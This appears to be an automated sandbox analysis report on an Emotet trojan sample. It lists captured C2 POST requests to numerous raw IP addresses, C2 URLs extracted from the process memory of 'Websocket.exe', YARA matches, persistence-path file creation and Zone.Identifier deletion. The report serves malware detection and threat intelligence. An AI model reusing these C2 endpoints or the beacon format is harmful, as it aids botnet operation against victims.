              Source: global trafficHTTP traffic detected: POST /JN2DplxF92Pi/qZ21yDZ4M/ris4gHcOGLF4hcPHwQ/A1nU/6tibZPGO3hJC/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 137.59.187.107/JN2DplxF92Pi/qZ21yDZ4M/ris4gHcOGLF4hcPHwQ/A1nU/6tibZPGO3hJC/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=----------------yA0yv22gQqHz91FmHost: 137.59.187.107:8080Content-Length: 4660Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /QhMD6KpexuBHSeyg/nmjgYh4l4ptvB/PGvKi7u5nK/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 94.23.237.171/QhMD6KpexuBHSeyg/nmjgYh4l4ptvB/PGvKi7u5nK/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=--------------------8l9iSdFwjKbTCnC5XLPOHost: 94.23.237.171:443Content-Length: 4628Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /Gm1WL3Kb/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 61.19.246.238/Gm1WL3Kb/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=------------H7vKgpo0TK2tHost: 61.19.246.238:443Content-Length: 4628Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /yeefk/tw301PEhQBGehUNW/CiErQs/MRjdl7CYu1IU7v3m15J/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 156.155.166.221/yeefk/tw301PEhQBGehUNW/CiErQs/MRjdl7CYu1IU7v3m15J/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=---------84P2IJMkLHost: 156.155.166.221Content-Length: 4628Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /nrCUrCE2yDTiIo4a/5Gs4u/KUPipnX9S5yDUVyF8b/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 50.35.17.13/nrCUrCE2yDTiIo4a/5Gs4u/KUPipnX9S5yDUVyF8b/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=--------------------pU7FVH6UNlQM04HdUu46Host: 50.35.17.13Content-Length: 4628Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /ekpYWl8oCs7C/uUSPOoA/83Mn2qAQ2/yBWXbxwj/GOVd3DoQP6/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 153.137.36.142/ekpYWl8oCs7C/uUSPOoA/83Mn2qAQ2/yBWXbxwj/GOVd3DoQP6/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=----------------5UCIEVFUgKC9ns3tHost: 153.137.36.142Content-Length: 4628Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /UgjaCEdTc9AlgOLmob/lJ2pCDETY/jJXL8eM/bkqmaKbdvAGP/AYsIr7b4/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 91.211.88.52/UgjaCEdTc9AlgOLmob/lJ2pCDETY/jJXL8eM/bkqmaKbdvAGP/AYsIr7b4/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=----------------------ayNnG1JNfmOIUancEJINhPHost: 91.211.88.52:7080Content-Length: 4628Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /mf37D3hHo2BT/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 209.141.54.221/mf37D3hHo2BT/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=----------------CRPJROu8mMuITH9VHost: 209.141.54.221:8080Content-Length: 4628Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /iXgMw5IajHPl8YAN7YB/fMpMhY2ZgzV/1nmECrP2Ezqoam/NWXlULDZs3bsJjB/p3LYI79/w2aCyOD7bcdtE/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 185.94.252.104/iXgMw5IajHPl8YAN7YB/fMpMhY2ZgzV/1nmECrP2Ezqoam/NWXlULDZs3bsJjB/p3LYI79/w2aCyOD7bcdtE/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=-----------------------3hc2nliStBsMSODJE62qalnHost: 185.94.252.104:443Content-Length: 4628Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /Ddrl52fpHV0Ytv/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 174.45.13.118/Ddrl52fpHV0Ytv/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=------------------BqLyxgk1GkivHaCG9jHost: 174.45.13.118Content-Length: 4628Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /gfPMhF/Be2SElHPLyLeACf/UucmketfQMMC3NqYN/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 87.106.136.232/gfPMhF/Be2SElHPLyLeACf/UucmketfQMMC3NqYN/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=----------5VkCfPKqCtHost: 87.106.136.232:8080Content-Length: 4628Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /9HkMmi/SILN3JKyaX8hSqvMF38/aphjJUbJpUw/J8LsQXmX6qW1KnnNp/dmiOqQTXBol2TIb9pL/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 62.75.141.82/9HkMmi/SILN3JKyaX8hSqvMF38/aphjJUbJpUw/J8LsQXmX6qW1KnnNp/dmiOqQTXBol2TIb9pL/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=----------F7zfpJ936gHost: 62.75.141.82Content-Length: 4628Cache-Control: no-cache
              Source: unknownTCP traffic detected without corresponding DNS query: 71.72.196.159
              Source: unknownTCP traffic detected without corresponding DNS query: 71.72.196.159
              Source: unknownTCP traffic detected without corresponding DNS query: 71.72.196.159
              Source: unknownTCP traffic detected without corresponding DNS query: 71.72.196.159
              Source: unknownTCP traffic detected without corresponding DNS query: 71.72.196.159
              Source: unknownTCP traffic detected without corresponding DNS query: 71.72.196.159
              Source: unknownTCP traffic detected without corresponding DNS query: 134.209.36.254
              Source: unknownTCP traffic detected without corresponding DNS query: 134.209.36.254
              Source: unknownTCP traffic detected without corresponding DNS query: 134.209.36.254
              Source: unknownTCP traffic detected without corresponding DNS query: 134.209.36.254
              Source: unknownTCP traffic detected without corresponding DNS query: 120.138.30.150
              Source: unknownTCP traffic detected without corresponding DNS query: 120.138.30.150
              Source: unknownTCP traffic detected without corresponding DNS query: 120.138.30.150
              Source: unknownTCP traffic detected without corresponding DNS query: 120.138.30.150
              Source: unknownTCP traffic detected without corresponding DNS query: 120.138.30.150
              Source: unknownTCP traffic detected without corresponding DNS query: 120.138.30.150
              Source: unknownTCP traffic detected without corresponding DNS query: 94.23.216.33
              Source: unknownTCP traffic detected without corresponding DNS query: 94.23.216.33
              Source: unknownTCP traffic detected without corresponding DNS query: 94.23.216.33
              Source: unknownTCP traffic detected without corresponding DNS query: 94.23.216.33
              Source: unknownTCP traffic detected without corresponding DNS query: 94.23.216.33
              Source: unknownTCP traffic detected without corresponding DNS query: 94.23.216.33
              Source: unknownTCP traffic detected without corresponding DNS query: 157.245.99.39
              Source: unknownTCP traffic detected without corresponding DNS query: 157.245.99.39
              Source: unknownTCP traffic detected without corresponding DNS query: 157.245.99.39
              Source: unknownTCP traffic detected without corresponding DNS query: 157.245.99.39
              Source: unknownTCP traffic detected without corresponding DNS query: 137.59.187.107
              Source: unknownTCP traffic detected without corresponding DNS query: 137.59.187.107
              Source: unknownTCP traffic detected without corresponding DNS query: 137.59.187.107
              Source: unknownTCP traffic detected without corresponding DNS query: 137.59.187.107
              Source: unknownTCP traffic detected without corresponding DNS query: 137.59.187.107
              Source: unknownTCP traffic detected without corresponding DNS query: 137.59.187.107
              Source: unknownTCP traffic detected without corresponding DNS query: 94.23.237.171
              Source: unknownTCP traffic detected without corresponding DNS query: 94.23.237.171
              Source: unknownTCP traffic detected without corresponding DNS query: 94.23.237.171
              Source: unknownTCP traffic detected without corresponding DNS query: 94.23.237.171
              Source: unknownTCP traffic detected without corresponding DNS query: 61.19.246.238
              Source: unknownTCP traffic detected without corresponding DNS query: 61.19.246.238
              Source: unknownTCP traffic detected without corresponding DNS query: 61.19.246.238
              Source: unknownTCP traffic detected without corresponding DNS query: 61.19.246.238
              Source: unknownTCP traffic detected without corresponding DNS query: 156.155.166.221
              Source: unknownTCP traffic detected without corresponding DNS query: 156.155.166.221
              Source: unknownTCP traffic detected without corresponding DNS query: 156.155.166.221
              Source: unknownTCP traffic detected without corresponding DNS query: 156.155.166.221
              Source: unknownTCP traffic detected without corresponding DNS query: 50.35.17.13
              Source: unknownTCP traffic detected without corresponding DNS query: 50.35.17.13
              Source: unknownTCP traffic detected without corresponding DNS query: 50.35.17.13
              Source: unknownTCP traffic detected without corresponding DNS query: 50.35.17.13
              Source: unknownTCP traffic detected without corresponding DNS query: 153.137.36.142
              Source: unknownTCP traffic detected without corresponding DNS query: 153.137.36.142
              Source: unknownHTTP traffic detected: POST /U79iM382/IZ04Joc/eLC1daPUos8/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 71.72.196.159/U79iM382/IZ04Joc/eLC1daPUos8/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=------------cs4fTNfbtTQbHost: 71.72.196.159Content-Length: 4660Cache-Control: no-cache
              Source: Websocket.exe, 00000002.00000003.2660753849.0000000002998000.00000004.00000020.00020000.00000000.sdmp, Websocket.exe, 00000002.00000002.3638024971.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, Websocket.exe, 00000002.00000003.2934884982.0000000002998000.00000004.00000020.00020000.00000000.sdmp, Websocket.exe, 00000002.00000003.3005905191.0000000002999000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://120.138.30.150:8080/3c7L3qI9O7w/Rm0uJBYq9TtaH/
              Source: Websocket.exe, 00000002.00000003.2660753849.0000000002998000.00000004.00000020.00020000.00000000.sdmp, Websocket.exe, 00000002.00000003.2934884982.0000000002998000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://120.138.30.150:8080/3c7L3qI9O7w/Rm0uJBYq9TtaH/u%
              Source: Websocket.exe, 00000002.00000003.2660753849.0000000002998000.00000004.00000020.00020000.00000000.sdmp, Websocket.exe, 00000002.00000002.3638576164.0000000002994000.00000004.00000020.00020000.00000000.sdmp, Websocket.exe, 00000002.00000003.2934884982.0000000002998000.00000004.00000020.00020000.00000000.sdmp, Websocket.exe, 00000002.00000003.3005905191.0000000002999000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://134.209.36.254:8080/T5Vg4Qw6cjD/Ig1s2FXtpuz/TQ9zRX6lxh/onfM1cXpehs4Ys/zuNlQfl2ySC/vyKTBvDcyug
              Source: Websocket.exe, 00000002.00000002.3638024971.00000000007EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://137.59.187.107:8080/JN2DplxF92Pi/qZ21yDZ4M/ris4gHcOGLF4hcPHwQ/A1nU/6tibZPGO3hJC/
              Source: Websocket.exe, 00000002.00000003.2934884982.0000000002998000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://137.59.187.107:8080/JN2DplxF92Pi/qZ21yDZ4M/ris4gHcOGLF4hcPHwQ/A1nU/6tibZPGO3hJC/S7
              Source: Websocket.exe, 00000002.00000002.3638576164.0000000002994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://153.137.36.142/ekpYWl8oCs7C/uUSPOoA/83Mn2qAQ2/yBWXbxwj/GOVd3DoQP6/
              Source: Websocket.exe, 00000002.00000002.3638576164.0000000002994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://153.137.36.142/ekpYWl8oCs7C/uUSPOoA/83Mn2qAQ2/yBWXbxwj/GOVd3DoQP6/h5
              Source: Websocket.exe, 00000002.00000002.3638576164.0000000002994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://156.155.166.221/yeefk/tw301PEhQBGehUNW/CiErQs/MRjdl7CYu1IU7v3m15J/
              Source: Websocket.exe, 00000002.00000002.3638576164.0000000002994000.00000004.00000020.00020000.00000000.sdmp, Websocket.exe, 00000002.00000003.2934884982.0000000002998000.00000004.00000020.00020000.00000000.sdmp, Websocket.exe, 00000002.00000003.3005905191.0000000002999000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://157.245.99.39:8080/iak3uhyFk7lpr6JuOK/tB1LHPYJU1WTt8sLQn/ANk4kL9bS/
              Source: Websocket.exe, 00000002.00000002.3638576164.0000000002994000.00000004.00000020.00020000.00000000.sdmp, Websocket.exe, 00000002.00000003.2934884982.0000000002998000.00000004.00000020.00020000.00000000.sdmp, Websocket.exe, 00000002.00000003.3005905191.0000000002999000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://157.245.99.39:8080/iak3uhyFk7lpr6JuOK/tB1LHPYJU1WTt8sLQn/ANk4kL9bS/1=
              Source: Websocket.exe, 00000002.00000002.3638576164.0000000002994000.00000004.00000020.00020000.00000000.sdmp, Websocket.exe, 00000002.00000003.2934884982.0000000002998000.00000004.00000020.00020000.00000000.sdmp, Websocket.exe, 00000002.00000003.3005905191.0000000002999000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://157.245.99.39:8080/iak3uhyFk7lpr6JuOK/tB1LHPYJU1WTt8sLQn/ANk4kL9bS/z=sU
              Source: Websocket.exe, 00000002.00000002.3638576164.0000000002994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://174.45.13.118/Ddrl52fpHV0Ytv/
              Source: Websocket.exe, 00000002.00000002.3638576164.0000000002994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://174.45.13.118/Ddrl52fpHV0Ytv/$=
              Source: Websocket.exe, 00000002.00000002.3638576164.0000000002994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://174.45.13.118/Ddrl52fpHV0Ytv/N5
              Source: Websocket.exe, 00000002.00000002.3638576164.0000000002994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://174.45.13.118/Ddrl52fpHV0Ytv/N=
              Source: Websocket.exe, 00000002.00000002.3638576164.0000000002994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.94.252.104:443/iXgMw5IajHPl8YAN7YB/fMpMhY2ZgzV/1nmECr
              Source: Websocket.exe, 00000002.00000002.3638576164.0000000002994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.94.252.104:443/iXgMw5IajHPl8YAN7YB/fMpMhY2ZgzV/1nmECrP2Ezqoam/NWXlULDZs3bsJjB/p3LYI79/w2a
              Source: Websocket.exe, 00000002.00000002.3638576164.0000000002970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://50.35.17.13/nrCUrCE2yDTiIo4a/5Gs4u/KUPipnX9S5yDUVyF8b/
              Source: Websocket.exe, 00000002.00000002.3638576164.0000000002970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://50.35.17.13/nrCUrCE2yDTiIo4a/5Gs4u/KUPipnX9S5yDUVyF8b/shqos.dll.muixj
              Source: Websocket.exe, 00000002.00000003.3005905191.0000000002999000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://61.19.246.238:443/Gm1WL3Kb/
              Source: Websocket.exe, 00000002.00000003.3005905191.0000000002999000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://61.19.246.238:443/Gm1WL3Kb/8
              Source: Websocket.exe, 00000002.00000003.3005905191.0000000002999000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://61.19.246.238:443/Gm1WL3Kb/LQn/ANk4kL9bS/
              Source: Websocket.exe, 00000002.00000002.3638576164.0000000002994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.75.141.82/9HkMmi/SILN3JKyaX8hSqvMF38/aphjJUbJpUw/J8LsQXmX6qW1KnnNp/dmiOqQTXBol2TIb9pL/
              Source: Websocket.exe, 00000002.00000002.3638024971.00000000007EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.75.141.82/9HkMmi/SILN3JKyaX8hSqvMF38/aphjJUbJpUw/J8LsQXmX6qW1KnnNp/dmiOqQTXBol2TIb9pL/%
              Source: Websocket.exe, 00000002.00000002.3638576164.0000000002994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.75.141.82/9HkMmi/SILN3JKyaX8hSqvMF38/aphjJUbJpUw/J8LsQXmX6qW1KnnNp/dmiOqQTXBol2TIb9pL/J/
              Source: Websocket.exe, 00000002.00000002.3638024971.00000000007EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.75.141.82/9HkMmi/SILN3JKyaX8hSqvMF38/aphjJUbJpUw/J8LsQXmX6qW1KnnNp/dmiOqQTXBol2TIb9pL/O
              Source: Websocket.exe, 00000002.00000002.3638576164.0000000002994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.75.141.82/9HkMmi/SILN3JKyaX8hSqvMF38/aphjJUbJpUw/J8LsQXmX6qW1KnnNp/dmiOqQTXBol2TIb9pL/m;%T
              Source: Websocket.exe, 00000002.00000002.3638024971.00000000007EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.75.141.82/9HkMmi/SILN3JKyaX8hSqvMF38/aphjJUbJpUw/J8LsQXmX6qW1KnnNp/dmiOqQTXBol2TIb9pL/tory
              Source: Websocket.exe, 00000002.00000003.2550427830.0000000002999000.00000004.00000020.00020000.00000000.sdmp, Websocket.exe, 00000002.00000002.3638576164.0000000002994000.00000004.00000020.00020000.00000000.sdmp, Websocket.exe, 00000002.00000003.2934884982.0000000002998000.00000004.00000020.00020000.00000000.sdmp, Websocket.exe, 00000002.00000003.3005905191.0000000002999000.00000004.00000020.00020000.00000000.sdmp, Websocket.exe, 00000002.00000002.3638576164.0000000002970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://71.72.196.159/U79iM382/IZ04Joc/eLC1daPUos8/
              Source: Websocket.exe, 00000002.00000002.3638576164.0000000002994000.00000004.00000020.00020000.00000000.sdmp, Websocket.exe, 00000002.00000002.3638576164.0000000002970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.106.136.232:8080/gfPMhF/Be2SElHPLyLeACf/UucmketfQMMC3NqYN/
              Source: Websocket.exe, 00000002.00000002.3638576164.0000000002994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.106.136.232:8080/gfPMhF/Be2SElHPLyLeACf/UucmketfQMMC3NqYN/ZI-T
              Source: Websocket.exe, 00000002.00000002.3638576164.0000000002994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.106.136.232:8080/gfPMhF/Be2SElHPLyLeACf/UucmketfQMMC3NqYN/~
              Source: Websocket.exe, 00000002.00000003.2660753849.0000000002998000.00000004.00000020.00020000.00000000.sdmp, Websocket.exe, 00000002.00000003.2934884982.0000000002998000.00000004.00000020.00020000.00000000.sdmp, Websocket.exe, 00000002.00000003.3005905191.0000000002999000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.23.216.33/4sERDG3EhH4jL/eJgQIlw4kZ/
              Source: Websocket.exe, 00000002.00000003.2660753849.0000000002998000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.23.216.33/4sERDG3EhH4jL/eJgQIlw4kZ/-467a0a8f1198bBKT
              Source: Websocket.exe, 00000002.00000002.3638576164.0000000002970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.23.216.33/4sERDG3EhH4jL/eJgQIlw4kZ/B
              Source: Websocket.exe, 00000002.00000002.3638024971.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, Websocket.exe, 00000002.00000003.3005905191.0000000002999000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.23.237.171:443/QhMD6KpexuBHSeyg/nmjgYh4l4ptvB/PGvKi7u5nK/
              Source: Websocket.exe, 00000002.00000002.3638024971.00000000007EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.23.237.171:443/QhMD6KpexuBHSeyg/nmjgYh4l4ptvB/PGvKi7u5nK/F~;T
              Source: Websocket.exe, 00000002.00000002.3638024971.00000000007EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.23.237.171:443/QhMD6KpexuBHSeyg/nmjgYh4l4ptvB/PGvKi7u5nK/fy
              Source: Websocket.exe, 00000002.00000003.3005905191.0000000002999000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.23.237.171:443/QhMD6KpexuBHSeyg/nmjgYh4l4ptvB/PGvKi7u5nK/lrI
              Source: unknownNetwork traffic detected: HTTP traffic on port 62405 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 62411 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62404
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62405
              Source: unknownNetwork traffic detected: HTTP traffic on port 62404 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62411

              E-Banking Fraud

              barindex
              Yara detected Emotet
              Source: Yara matchFile source: 2.2.Websocket.exe.60279e.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ExeFile (356).exe.5f279e.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ExeFile (356).exe.5f279e.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ExeFile (356).exe.600000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.Websocket.exe.60052e.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.Websocket.exe.60052e.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ExeFile (356).exe.5f052e.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ExeFile (356).exe.5f052e.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.Websocket.exe.60279e.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.Websocket.exe.610000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.2389548651.00000000020E4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.3637813859.0000000000734000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2389343212.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.3637503164.0000000000600000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.3637575010.0000000000611000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2389373625.0000000000601000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\SysWOW64\provcore\Websocket.exeCode function: 2_2_006125A0 CryptAcquireContextW,CryptImportKey,LocalFree,CryptCreateHash,CryptDecodeObjectEx,CryptDecodeObjectEx,CryptGenKey,2_2_006125A0

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 2.2.Websocket.exe.60279e.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 0.2.ExeFile (356).exe.5f279e.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 0.2.ExeFile (356).exe.5f279e.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 0.2.ExeFile (356).exe.600000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 2.2.Websocket.exe.60052e.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 2.2.Websocket.exe.60052e.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 0.2.ExeFile (356).exe.5f052e.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 0.2.ExeFile (356).exe.5f052e.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 2.2.Websocket.exe.60279e.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 2.2.Websocket.exe.610000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 00000000.00000002.2389548651.00000000020E4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 00000002.00000002.3637813859.0000000000734000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 00000000.00000002.2389343212.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 00000002.00000002.3637503164.0000000000600000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 00000002.00000002.3637575010.0000000000611000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 00000000.00000002.2389373625.0000000000601000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: C:\Users\user\Desktop\ExeFile (356).exeFile created: C:\Windows\SysWOW64\provcore\Jump to behavior
              Source: C:\Users\user\Desktop\ExeFile (356).exeFile deleted: C:\Windows\SysWOW64\provcore\Websocket.exe:Zone.IdentifierJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (356).exeCode function: 0_2_006080D00_2_006080D0
              Source: C:\Users\user\Desktop\ExeFile (356).exeCode function: 0_2_00607D600_2_00607D60
              Source: C:\Users\user\Desktop\ExeFile (356).exeCode function: 0_2_00601C700_2_00601C70
              Source: C:\Users\user\Desktop\ExeFile (356).exeCode function: 0_2_006075300_2_00607530
